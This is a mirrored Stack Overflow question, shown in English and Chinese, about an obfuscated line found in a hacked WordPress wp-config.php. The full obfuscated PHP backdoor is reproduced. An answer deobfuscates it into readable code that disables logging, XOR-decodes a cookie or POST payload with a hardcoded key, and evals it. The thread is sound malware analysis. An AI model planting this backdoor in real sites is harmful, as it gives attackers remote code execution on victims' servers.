堆栈内存溢出
  简体   繁体   English

Wordpress Hacked,了解wp-config.php上的混淆行

[英]Wordpress Hacked, understanding obfuscated line on wp-config.php

 原文  2016-06-07 05:10:50       php/ deobfuscation

问题描述

my friend's wordpress wp-config.php was added with one line of code: 我的朋友的wordpress wp-config.php添加了一行代码: 

$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);@$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=@$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>@$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo@$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}

What does it means? 这是什么意思? I've tried to change eval to print, but nothing shown. 我试图改变eval来打印,但没有显示。

https://eval.in/584427 https://eval.in/584427

2 个解决方案

解决方案1
 2 已采纳  2016-06-07 06:19:43

By using a var_dump after the first statement with $_COOKIE I could see that the structure of the first array appears to contain several function names which are supposedly called later: 通过在带有$_COOKIE的第一个语句之后使用var_dump ,我可以看到第一个数组的结构似乎包含几个函数名称,这些函数名称应该稍后调用: 

var_dump($ge142efa);

array(14) {
  ["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18   H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^@G,n]\;MXv?5){}Rcowfjb>A-"
  ["hfa2b"]=>
  string(3) "chr"
  ["he58"]=>
  string(3) "ord"
  ["ge19947"]=>
  string(6) "strlen"
  ["xa2a5ede"]=>
  string(7) "ini_set"
  ["k5051"]=>
  string(9) "serialize"
  ["z2503c"]=>
  string(10) "phpversion"
  ["i50830251"]=>
  string(11) "unserialize"
  ["kf8736"]=>
  string(13) "base64_decode"
  ["vc05"]=>
  string(14) "set_time_limit"
  ["u491"]=>
  string(4) "i461"
  ["v2298682"]=>
  string(4) "g2bc"
  ["re5bf"]=>
  string(6) "$_POST"
  ["j975"]=>
  string(8) "$_COOKIE"
}

I have replaced the $_POST and $_COOKIE contents with strings as placeholders because my test environment is php -f inside a container. 我用字符串替换了$_POST$_COOKIE内容作为占位符,因为我的测试环境是容器内的php -f

The part between this array and the first function declaration boils down to this: 这个数组和第一个函数声明之间的部分归结为: 

@ini_set('error_log', NULL); // @$ge142efa['xa2a5ede']('error_log', NULL);
@ini_set('log_errors', 0); // @$ge142efa['xa2a5ede']('log_errors', 0);
@ini_set('max_execution_time', 0); // @$ge142efa['xa2a5ede']('max_execution_time', 0);
@set_time_limit(0); // @$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';

The first function reads thus: 第一个函数如下: 

function g2bc($tf027f, $p7ec){
  global $ge142efa;
  $de211af = "";
  for($i = 0; $i < "strlen"($tf027f);){
    for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
      $de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
    }
  }
  return $de211af;
}

It appears to xor two strings and return the result. 它似乎xor两个字符串并返回结果。 The function below that, i461 , uses it twice: 下面的函数i461使用它两次: 

function i461($tf027f, $p7ec){
  global $ge142efa;
  global $m001c8475;
  return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}

The code below these two functions can be beautified to this: 这两个函数下面的代码可以美化到这个: 

foreach($_COOKIE as $p7ec => $i61171){
  $tf027f = $i61171;
  $w38258dd = $p7ec;
}
if(!$tf027f){
  foreach($_POST as $p7ec => $i61171){
    $tf027f = $i61171;
    $w38258dd = $p7ec;
  }
}
$tf027f =@ "unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
  if($tf027f["a"] == "i"){
    $z225cd560 = Array("pv" => @"phpversion"(), "sv" => "1.0-1",);
    echo@"serialize"($z225cd560);
  }elseif($tf027f["a"] == "e"){
    eval($tf027f["d"]);
  }
  exit();
}

The critical part here is the eval . 这里的关键部分是eval From my point of view this looks like code that executes something given by the right combination of $_COOKIE and/or $_POST . 从我的角度来看,这看起来像执行由$_COOKIE和/或$_POST的正确组合给出的代码。 Basically a portion of code waiting to get the right request and execute the code specified by it. 基本上是一部分代码等待获取正确的请求并执行它指定的代码。

解决方案2
 1  2016-06-07 05:28:10

I'm Just dealing with same issue. 我只是处理同样的问题。 Your friend's have to make some changes. 你的朋友必须做出一些改变。 May be IP Address is traced by some person & he is doing some changes in database and it's affecting your front end and code also. 可能是IP地址被某人跟踪,他正在对数据库进行一些更改,这也会影响您的前端和代码。 

 - If you have backup of database then change the database. 
 - Install some security Plugin like All In One WP Security & Firewall.
   (Because if IP is traced again than it may help in future).

Some other changes. 其他一些变化。

  • Search Images path in database may be it contains malware. 搜索图像数据库中的路径可能包含恶意软件。
  • Remove unused script from code. 从代码中删除未使用的脚本
  • Change Admin panel login credential. 更改管理面板登录凭据。
  • Change Cpanel credential. 更改Cpanel凭证。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 WordPress wp-config.php - Wordpress wp-config.php WordPress本地化wp-config.php - WordPress localization wp-config.php WordPress插件文件中包含wp-config.php文件的问题 - Issue to include wp-config.php file in wordpress plugin file WordPress wp-config.php if-else 在某些计算机上不起作用 - WordPress wp-config.php if-else is not working on some computers 如何修复wp-config.php在WordPress中上传图片? - How to fix wp-config.php to upload pictures in WordPress? 如何获得WordPress站点的wp-config.php文件路径? - how to get a file path of wp-config.php of wordpress site? 通过 wp-config.php 在 wordpress 上正确强制 SSL - Correctly force SSL on wordpress via wp-config.php 阿帕奇。 如何将 wp-config.php 和 wp-content 从 wordpress 核心移出? - Apache. How to move wp-config.php and wp-content outside from wordpress core? wp-config.php文件中的WordPress WP_CACHE_KEY_SALT值错误 - Wordpress WP_CACHE_KEY_SALT value is wrong in wp-config.php file 我如何在wp-config.php的wordpress数据库配置中定义和选择随机用户? - How do i define and select random user in wordpress database config in wp-config.php?
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM